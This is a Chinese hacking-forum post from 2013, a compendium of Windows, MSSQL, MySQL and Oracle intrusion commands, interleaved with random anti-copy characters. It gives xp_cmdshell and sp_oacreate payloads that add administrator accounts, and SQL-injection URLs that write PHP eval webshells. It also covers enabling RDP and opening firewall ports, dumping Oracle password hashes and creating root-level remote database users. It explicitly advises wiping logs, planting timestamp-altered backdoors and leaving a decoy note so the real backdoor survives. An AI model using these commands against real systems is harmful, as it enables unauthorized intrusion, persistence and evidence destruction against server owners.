中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]

作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全
9 O' I* b- [* f% w  L
1.net user administrator /passwordreq:no( o% \; ^! {# A+ ?4 v
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
/ e0 H- A0 R6 k/ \9 E- Y4 {2.比较巧妙的建克隆号的步骤
8 ?4 M; c  B4 T: u2 K3 w先建一个user的用户0 E  A7 N+ n7 P: J3 i
然后导出注册表。然后在计算机管理里删掉
0 y0 ]7 j8 w8 f在导入,在添加为管理员组6 b9 V' N$ B+ @$ d0 j9 ]
3.查radmin密码
4 Y' z3 U6 A2 P/ m, D. C9 ereg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
) s1 w5 x# k3 y# O2 E& B1 ^2 {( B$ M4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
8 V' z) D$ U/ I7 M8 r建立一个"services.exe"的项5 e9 a/ `' @( Z$ |$ L: L
再在其下面建立(字符串值). Q" c0 X: G. ?3 g6 g2 \
键值为mu ma的全路径
/ z. j- T2 p( {# t4 Y4 x: g5.runas /user:guest cmd
4 b8 L1 Z8 C4 t0 M. N2 ~! I4 I: B) Q1 @测试用户权限!# P. e4 ~  `7 I5 T) @
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
! P: `/ R  c8 j) R7.入侵后漏洞修补、痕迹清理,后门置放:
' g/ `  m  T! |% S基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
: v% A. H, x/ J" a: {" g4 h, M8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c/ V+ `7 G( i: @2 S
  N: O7 f# l/ X; `; K& S4 ?' j
for example
4 J2 X+ C0 Y- Q! |
# f4 S/ I' y8 x3 P$ Ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'" ?8 T! }9 P/ Y% P- q4 n
  }' `* L, n* @1 g  y. X
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add': d" r+ z, i  _8 W  I

0 A& F0 N9 |9 f1 e) ]5 v9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
: Z* d6 Z- p; h9 s/ T# y3 z- N如果要启用的话就必须把他加到高级用户模式+ z& s& C- K% ~
可以直接在注入点那里直接注入# _- K2 U% [( H/ ^6 h# @4 k
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--3 v. D* H" o6 \: P$ b; I
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--2 l5 @1 N: \8 ]1 l# h
或者) B3 r8 x6 ^) h+ l9 L: c% {3 u! D" d
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'& m, f/ x* x( h) |/ t" ?
来恢复cmdshell。
: ?* I4 j* Z6 f5 H  O) `% n
( o1 C" Z  _3 \分析器
& Q1 e! q$ J! A1 cEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
& T3 `. K# c/ o* b然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
: A  Z- O; I$ m5 ^10.xp_cmdshell新的恢复办法; j6 `0 j0 t5 R- m) E9 r# {: U
xp_cmdshell新的恢复办法
2 L3 |0 g8 L+ f7 B扩展储存过程被删除以后可以有很简单的办法恢复:1 l4 m# ~% ?- B0 F7 X" D, o
删除( {2 u! L9 j$ |, [7 b
drop procedure sp_addextendedproc
4 T" h/ }1 _6 l% A+ pdrop procedure sp_oacreate
5 |9 R3 G7 {: P0 g- {/ M* sexec sp_dropextendedproc 'xp_cmdshell'+ F/ V4 V7 o" P( W1 M
) p  i( l& Q2 N4 g
恢复
. W/ K" F+ s1 H+ @dbcc addextendedproc ("sp_oacreate","odsole70.dll")5 Y( T0 E& h: `3 ?' M$ c% @
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
" I0 K6 b: O1 N, R
, u" P$ i* a# ^这样可以直接恢复,不用去管sp_addextendedproc是不是存在
( L9 F. H2 \8 E! c2 k8 M5 H
2 G* b! _& F7 B-----------------------------
& o* b3 Q/ {0 G4 r3 M, U0 T8 n& a7 ^  o! w$ U3 w
删除扩展存储过过程xp_cmdshell的语句:
/ J  I9 K3 B9 \% F4 b: \, D( A% sexec sp_dropextendedproc 'xp_cmdshell'
) V. D. E! z8 I, d, f; h& F
; m7 A/ s" @% Y& S4 t$ v恢复cmdshell的sql语句
0 \* n  U) w3 j5 B% Z( x+ a. Qexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
3 _' d+ i1 G* Z  S# B6 y/ n
; ^$ @  T5 d' o% c8 U7 O! e0 z4 X/ P3 o4 g
开启cmdshell的sql语句# u1 F3 `% \1 r& S
! V& E# M6 J0 ^! Z
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
+ B% i! ^; v; n" B
/ y3 b# X1 W6 D3 d# n判断存储扩展是否存在% z: \( _  b) x9 P3 M( Y4 [, L
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
7 P- K9 J' N6 F6 B2 b返回结果为1就ok
! a" }; r; _4 i9 r+ u' p+ n! A8 G/ i; d+ H' N4 _& Y8 y
恢复xp_cmdshell
! \+ V0 L2 e* j* K. @* N/ `, J( Wexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'4 j% r/ ~$ c1 ^' q7 ~
返回结果为1就ok0 M5 ], B, s- O5 T) g

* d9 ~& D; H( r% n8 Q: G否则上传xplog7.0.dll
0 Y( P# W# R" Rexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll') N9 r  z/ ?8 {: ]: W

0 |$ |/ y7 T4 {3 a+ q堵上cmdshell的sql语句
& n; z6 F! ?. Y* M1 W" Ksp_dropextendedproc "xp_cmdshel+ G  H% F+ e3 l  m8 K1 S, d# c
-------------------------
9 p, J% g( U7 c( j$ f清除3389的登录记录用一条系统自带的命令:
* Q  U' n/ ^6 n3 Oreg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
2 w) J$ z4 N, Y
1 j% {) U$ Q9 }$ u' N4 R然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
6 a( x# X; O; ]/ A# d; Z2 z在 mysql里查看当前用户的权限
0 U& W1 T# n8 l" `/ Gshow grants for  + l  B. v8 p  o2 \
3 \+ c2 R1 q& i
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
2 B# ]6 |8 b5 p/ T- {/ [' c& F+ A+ K% n' }! q

! }0 G- s7 r( o5 }' LCreate USER 'itpro'@'%' IDENTIFIED BY '123';9 v9 i, `0 a1 I% V

  i, c. L! P, J" G, `0 c. |GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
% G1 T" q% w, ~) f6 i1 M5 x) @8 A4 E' F, V. O; s' \7 D  \
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
  k/ v* ^. e- o; h; L2 f# S- d) ~  n3 o/ U) ]
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;: d& [& s1 e; X2 ?1 t: C' H. A3 t# A

4 T8 y1 s5 k9 Y8 R, ~搞完事记得删除脚印哟。% j$ C: L5 }  m/ x8 M2 R
& ^- r+ E$ h3 n/ ?! G! r3 D* w
Drop USER 'itpro'@'%';
# J. A8 a  X; @; L* H8 o  S# \/ y: Z3 i
8 {8 D9 L5 R/ I, k2 T0 U; [, t% LDrop DATABASE IF EXISTS `itpro` ;
  \8 ]+ T, C# K7 O( Q: n" `7 l; g
5 Z" K# v  i  E% n6 P) s8 P* }当前用户获取system权限
, s- G  a: N1 f$ ?. J, T7 u1 m3 ~sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
3 d, O; S( A+ N* ^+ e. X$ Bsc start SuperCMD( g+ _/ N& ^. b# U, O) m3 R+ n! ^
程序代码
; U  c/ [- |- p) L% U/ O; }<SCRIPT LANGUAGE="VBScript"># V# Q1 S% d& Q# ^' Q# ~9 N+ [* Z
set wsnetwork=CreateObject("WSCRIPT.NETWORK")  h/ {$ v  c1 v' S9 B# d: U' N
os="WinNT://"&wsnetwork.ComputerName
6 A6 f/ d+ E3 H' N  I) u5 DSet ob=GetObject(os)
# Q) [6 v1 R8 I  l, U$ _Set oe=GetObject(os&"/Administrators,group")
' N/ W! p% ?$ \/ ]' c% s! |7 ASet od=ob.Create("user","nosec")9 y1 D2 q  A' Y1 T1 K
od.SetPassword "123456abc!@#"
5 c. E+ r7 G9 A5 |2 _2 Bod.SetInfo* M3 i! [, B# Q& N
Set of=GetObject(os&"/nosec",user)
) A* u$ [7 j5 T" Boe.add os&"/nosec"/ p( `: M3 [$ v  \
</Script>
( b+ r$ v# x; z- e<script language=javascript>window.close();</script>+ v9 F7 x5 k  m2 V- {

* S( ?( |1 r* C" t3 n/ `3 W7 ?5 n: Q
% Q' [' `4 f" a: O& j
+ ?7 x9 f& ]% J4 E. |: k
突破验证码限制入后台拿shell: G! z! c( P% X. Q; n( y" Z
程序代码  n8 z4 W' w$ Q& D  B; k
REGEDIT4 0 Q+ q! |+ A; f( W4 A+ Q+ \
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
  S' q! K" T: }2 ~  Y0 d"BlockXBM"=dword:00000000$ n& ]% u5 n" D3 m" W6 Z

" o# x0 u1 c2 N! D$ n, W保存为code.reg,导入注册表,重器IE! _9 J4 Z: [( h
就可以了6 i3 Y* g0 L5 Z. X: {; k
union写马
/ L2 i7 M+ d/ A8 W- r: A; p# S% M' |程序代码+ c1 z0 c7 K8 `7 w; ]4 C' t
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
8 v- c9 s! Y. u! E* ?9 ], R! P
. N$ @' A! B. j0 m5 {应用在dedecms注射漏洞上,无后台写马3 w  ?& w% O) H7 z2 H
dedecms后台,无文件管理器,没有outfile权限的时候- s; m1 @% Y" S9 [
在插件管理-病毒扫描里
0 ~6 `7 D3 I: }2 J' T, C+ U写一句话进include/config_hand.php里
1 W7 x9 w# H' H/ i5 K; Y' w程序代码
, {* j/ L8 K- D0 ^0 {% E>';?><?php @eval($_POST[cmd]);?>, ]. T$ a% ]7 C: ~$ s2 n

1 j7 O" Q- m! a' v- U5 s, j  C' ^- v6 w3 c
如上格式
0 i, v' n! |+ Y. j# P$ Y0 P  s$ l7 h4 B0 |, ^' }8 _0 W
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
: s+ ^" g* x% m* g( Q2 J" C  _程序代码
) D$ e$ c/ K! f0 Nselect username,password from dba_users;" _" ~& T5 z& V1 n# Z3 T) p

9 \' ]& E3 v  C6 @- R2 y3 M/ D: y* G
9 Y% q1 x* o6 i; a1 Rmysql远程连接用户
1 Z0 U- d+ P* }8 @9 G程序代码
" C5 u' t  u! L9 }1 @
; Z& a' w: i4 ?* Q, ~# u& ~Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
1 E% H& k3 f" H& R' c! lGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
6 A( f! y! S+ E) S; u/ tMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
2 c" C6 t( @. jMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;/ _  R2 w5 D1 i: H" y

0 G0 I$ h* O/ `% _4 w7 W; ?  ^7 k9 @  u, Y$ d
2 S; ?: ^- ~2 u
6 a6 Y4 ^8 L1 Z1 S/ \
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
9 h4 s1 c( U9 T
( _4 s# v6 Y+ M1 j+ f1.查询终端端口: f2 d+ t8 U+ Q' i
2 z6 }7 m( I: }3 Q3 y: L* Y8 _4 Z6 Z
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
8 R3 n5 B$ j! f8 g
8 B1 p6 J% h9 L5 {通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp". e6 e+ d* f9 [5 Q1 q: A$ E
type tsp.reg
9 \3 A* s4 k+ E4 e" Q
$ m  ]: k, P; A( G4 R2.开启XP&2003终端服务
9 }1 w# a" o( ]" }* `9 C3 ^* X
. w- \, O# `: ~# S2 z$ f' k' l- w% r5 q% R; j/ ~$ k* \
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
, `* J4 v' X  _4 n! v- _4 X9 c! t* L: r  w: ?
7 C2 T% J6 O" o; T5 w$ M# T
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f2 K" V  O" w/ `- N+ A0 o
6 ^0 `, s  X6 v0 Q7 A9 ~3 [
3.更改终端端口为20008(0x4E28)) G. [( E0 @7 {5 ~$ w8 x7 E
8 U5 m; n' j+ W. T" o, \9 e
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
; ~3 Q" ^0 @4 \* T3 _6 r
4 a: a3 O; t0 J$ }REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
2 @7 b& z6 x( z3 V7 r# S3 d) I
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
4 c$ r, Z' `/ J6 i+ G. p) l1 ?( \6 ^4 a6 w2 C
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f8 i$ ?7 W% v, ^8 ]

0 `8 Z+ J% q9 f+ r+ }6 d5 i9 C. H
( u5 H6 u5 R* y3 E  F( D+ i5.开启Win2000的终端,端口为3389(需重启)5 M6 x  O; o1 I$ r+ Y

$ a% I# h$ p7 W  z# m" \echo Windows Registry Editor Version 5.00 >2000.reg % A1 \3 P; |5 ~' @: v+ n( [
echo. >>2000.reg; Y/ V) |2 M4 }4 l" o
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 1 i& U, o, \1 R3 u4 f& B8 Y$ e
echo "Enabled"="0" >>2000.reg 8 q# ^1 x8 X+ m/ z, e
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg * _. `+ ]) i( v; x7 x& [7 R+ g
echo "ShutdownWithoutLogon"="0" >>2000.reg % n9 l1 K& \) L$ \0 p/ [# D
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg * _8 H: G' ?9 C8 r' e. N7 [  d- U, r# w
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg ' @& I5 u# i; d9 i- e/ @! l
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg / U- G; V0 ]. E2 o7 x$ E
echo "TSEnabled"=dword:00000001 >>2000.reg
+ l5 y) a1 U/ a/ ^6 y+ T% A0 C3 Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
+ l6 p/ d) T+ j$ lecho "Start"=dword:00000002 >>2000.reg + H6 J& w4 V' l$ h" J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg 2 \  A( s: v# x2 o5 ?
echo "Start"=dword:00000002 >>2000.reg $ O+ N0 v- P: H7 K. D  c
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
  V! l; _6 ~3 T0 \. v: uecho "Hotkey"="1" >>2000.reg 5 W" t) H& `) N. L6 s
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
! v- q$ z- T0 r9 x% |- p+ Techo "ortNumber"=dword:00000D3D >>2000.reg
" h( ~' c0 s; O. h4 I9 Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg # L& }+ A% s7 ]7 B, v/ i
echo "ortNumber"=dword:00000D3D >>2000.reg# I( O# ^" |( f9 p

# j( u: [% g! g8 f6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
6 d) C1 K( m( @; L* N
3 e8 q) c0 e) U9 b@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
" Q" }% L# B1 j# b9 ?(set inf=InstallHinfSection DefaultInstall)& Z3 ?# c2 J* ^/ q8 h; }* T7 n4 y
echo signature=$chicago$ >> restart.inf
7 ^, M5 A" l7 }echo [defaultinstall] >> restart.inf) g% e) U  I8 C1 R" ~. Y# w8 O
rundll32 setupapi,%inf% 1 %temp%\restart.inf7 Q2 X2 [2 T3 c: n7 n0 k% H( ]9 _# H2 a
: \7 D* v2 D5 F9 D
& ]$ v8 ~8 U8 H! z
7.禁用TCP/IP端口筛选 (需重启)9 N+ f: k( c3 P

5 [! F7 ?% Z, P, @( l6 b/ ]REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f1 m  @8 c0 l. u1 E5 l! _) S( ^6 q
" `+ A& u& X# ~
8.终端超出最大连接数时可用下面的命令来连接
1 d' \+ H  G) n: f4 \2 H+ t, Q3 T" N; v$ ?* s
mstsc /v:ip:3389 /console7 C6 R+ L8 D$ A: j

2 z  S( B& S, ^1 w; n& L9.调整NTFS分区权限
5 ~& R0 R9 x) F1 P1 c6 f1 {) Q$ w
* z) B' x7 B9 Q, }2 Xcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)9 {1 z7 i. M+ j% \# a6 y& S

, b" D% r) Q* _+ u' L6 qcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件). S- l2 C9 k7 u6 w9 V& I, }, F$ V
# ]+ P* [; j* z. B
------------------------------------------------------
3 ~4 m0 `& f3 W6 \" J( R3389.vbs
3 p  j: ^4 f* n6 I1 p( u/ tOn Error Resume Next
; {7 O# g9 Z0 ^& k9 v0 L$ C* ^! o4 bconst HKEY_LOCAL_MACHINE = &H80000002
! s! o3 L9 ]  s0 T9 Y; n$ B3 c7 MstrComputer = "."
( v' L- l- `/ ^& p/ Y: U1 P3 \' SSet StdOut = WScript.StdOut# @: q. @+ [) V( D0 o* d
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
' G( _# C4 T1 T* O) Z% X( estrComputer & "\root\default:StdRegProv")
+ o% ^. F. B: X1 _, \  O& ?! gstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"( x1 o! Z+ ?4 u& r# ^  D/ u) m
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath# @* }4 g& ?+ B4 k& d  R: T
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"( C% l/ }4 c% L
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
5 m- n1 G4 h# j0 x$ YstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"# R: j  A: x0 @, ]8 e* k6 X* J* m' `
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
" X# C6 x- O. Z$ n) f5 |  M1 D/ y/ MstrValueName = "fDenyTSConnections"
/ n) e2 |9 u# r% r) qdwValue = 0
% o& `: C6 q! n( l/ i" I. roreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue+ a% Q, B; r! {/ S9 {7 i6 w
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
( p0 ^5 G3 H/ V8 Q0 x: H2 ostrValueName = "ortNumber"# m# f# ]6 m0 h. a( t# ]
dwValue = 3389, O2 Q8 \/ S) m$ j7 {% L
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
6 p: d( n- ?% l! E9 C1 HstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
/ j; w+ \. r  `strValueName = "ortNumber"
4 _" r3 O" h9 i; n$ l' }' w$ `dwValue = 3389
! D. w1 d0 Z# y; ]+ V4 V' `9 B5 Coreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
7 P( ~8 d7 N9 L+ u' x  N+ rSet R = CreateObject("WScript.Shell") % ^/ B: Z) P, ]9 w
R.run("Shutdown.exe -f -r -t 0") + ]! i) @7 e) w3 h+ K
$ Y' a5 A: J4 L. J" B; Z$ ]
删除awgina.dll的注册表键值  g5 e& V4 q# T8 c$ K5 n5 g3 o
程序代码7 k% }( x7 r8 n/ s9 t+ {. z

* N; U6 c! t) ^* R$ [- g3 m$ vreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
' G% }3 f" M7 \0 }: K& o7 ~6 g. s$ t) t

3 Z- i! \, B+ G/ J7 }% O6 C; {. w
, E. b- X8 ?* h+ @) r  n8 G% W$ w" b
2 D, [, V2 `+ k) _# J2 @程序代码) T" y. O! }$ ~+ F7 p
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash! G7 n6 Z1 H6 s/ T  R- q" S
* F; A. T3 g5 ]
设置为1,关闭LM Hash) p$ L  _! L9 b) `

5 D: s5 r3 s! y, v3 S数据库安全:入侵Oracle数据库常用操作命令, O+ d. L; \0 g  P, e& T+ i: n, @
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
9 ^6 {+ S# M1 Y/ Z1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
, e/ n: z) y) }* J- t0 B2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;: P* g2 d+ B' ~% f
3、SQL>connect / as sysdba ;(as sysoper)或
2 w1 q5 r- u' O0 R  lconnect internal/oracle AS SYSDBA ;(scott/tiger)
3 u% W! N; ]) h* u; s' Hconn sys/change_on_install as sysdba;% `# `8 u3 v+ s3 g& s! z  `; d* m! D
4、SQL>startup; 启动数据库实例2 W/ R; H' }3 Q7 S# s
5、查看当前的所有数据库: select * from v$database;! u, m& k* A, ]: h  R
select name from v$database;
% [) u) b8 b4 u1 @% m" R/ u% X6、desc v$databases; 查看数据库结构字段9 f: ]1 |$ k5 ~  m( N# {
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
9 v6 `4 r* W1 ]# }. H6 VSQL>select * from V_$PWFILE_USERS;
2 H* ~0 ^' M5 J; X6 \! T+ d9 L9 pShow user;查看当前数据库连接用户
+ `: t1 }/ A, i3 ?1 A! d8、进入test数据库:database test;
' H8 t0 B! W2 I! e  e/ N" s7 W9、查看所有的数据库实例:select * from v$instance;
+ T2 n) g  P( U  ?" X4 o如:ora9i+ ?, P( u* q, ]+ z, j0 \5 c! ?9 ]7 L
10、查看当前库的所有数据表:4 L8 N) U1 e7 O% O# d% \" o
SQL> select TABLE_NAME from all_tables;7 s7 d! w- v3 @; _) r- n7 g- L: k& r
select * from all_tables;
% g) w7 Y" e% Q! i  s) pSQL> select table_name from all_tables where table_name like '%u%';% v! h% ^- P2 w' U7 j
TABLE_NAME
; x! ?6 d% J0 ^3 j------------------------------
" ~: B2 e# |/ W! ~  }, M: n  h_default_auditing_options_1 g" A% C; F4 w) }  t& m
11、查看表结构:desc all_tables;
' x- O, R, Q' D" w& Z# E12、显示CQI.T_BBS_XUSER的所有字段结构:
! k- g5 ?5 T; J, j0 Z! E3 j3 Gdesc CQI.T_BBS_XUSER;
3 D) Q. n7 }+ B9 ]1 O+ y" M, `13、获得CQI.T_BBS_XUSER表中的记录:; @; A$ T. i. l: J% j( |
select * from CQI.T_BBS_XUSER;
: m0 K9 Z! Z# y14、增加数据库用户:(test11/test)
- v: I) R. g6 b6 g0 Z% @create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;% V( f6 X5 ?8 b) O# C0 e
15、用户授权:6 ^- Q7 D4 `. V- i# |
grant connect,resource,dba to test11;( ]- v  K% \, P. }- p$ d
grant sysdba to test11;* ^0 T5 L! Y! t" D7 w& K8 U' Z
commit;7 L% A& \8 a# F' \6 D: y
16、更改数据库用户的密码:(将sys与system的密码改为test.)* }* W( m2 }) `
alter user sys indentified by test;# E3 e1 f. V* x; w; w+ {
alter user system indentified by test;
/ ^0 M6 s; x( H+ y0 S/ v
7 v! C. p6 [' `/ s' T9 B- japplicationContext-util.xml
0 X2 R7 f# D: k' f$ \applicationContext.xml
5 s; P9 D' Y+ G- l0 e: ostruts-config.xml2 u2 P- [: O8 \2 Z8 m4 U' G
web.xml
% q+ m+ N7 \* E. t, Zserver.xml6 @& N$ Z. |  d+ N' ]5 h1 m% n/ o" d
tomcat-users.xml
+ z0 s" l: b5 @" \# k3 C+ E1 ]hibernate.cfg.xml
, K3 I; j& u3 q" P4 Idatabase_pool_config.xml$ p. V+ ~- p& }+ ^. B' A3 J) Y& j
& j$ C( t5 F# W* T$ f) A
4 A+ u# N/ ]& N0 h( v& P
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置$ _/ C  y$ `% S; a
\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini; i6 f# g1 b# M
\WEB-INF\struts-config.xml  文件目录结构
/ t3 x# t; z$ ?# A- Z
; e% J5 n- D) z- J7 Rspring.properties 里边包含hibernate.cfg.xml的名称+ a/ k- l$ i' l  i( I" t
% T7 r- F. }5 {' W) _
5 ], f' B) O5 E: v; F& T) P
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
+ U" c& L7 h/ Q6 W. W) Q- U% d3 k6 w. \$ O% N/ C
如果都找不到  那就看看class文件吧。。
& B' C; Z+ L5 U. ~
" _# o; L0 U: M0 i) v" ~( V3 ]测试1:6 i' ]8 w4 V' v+ Q" P  j/ H0 K1 i% R
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1: B1 z+ v8 P2 t9 ?, X
& ]8 O0 z7 W. q* |
测试2:
8 R  L( ~' Z( {1 J0 q4 z
0 s( K% t5 w9 n4 Mcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
  Y/ N0 H# Y4 B
% K: N! E* M4 ^' h) U+ Z5 d/ `6 Kdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--. B' `4 ]2 w; r* s1 c5 {7 y1 J( j4 {
! F: M& l- p! o- m
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
8 i1 V* ]0 C, m7 l" I7 X/ z+ B
9 S) P8 w5 [2 |查看虚拟机中的共享文件:' J* S9 @) ^$ h$ ^& j! a
在虚拟机中的cmd中执行) n7 [/ j! a* W: S  C) {
\\.host\Shared Folders$ G2 U: N) f' d" R) ?
! b, r9 X1 Y: g8 r# A2 G
cmdshell下找终端的技巧. n- _% X( j! v$ \+ T3 N2 |, M; V
找终端: 1 r4 u9 J4 q  y4 y) g, F
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
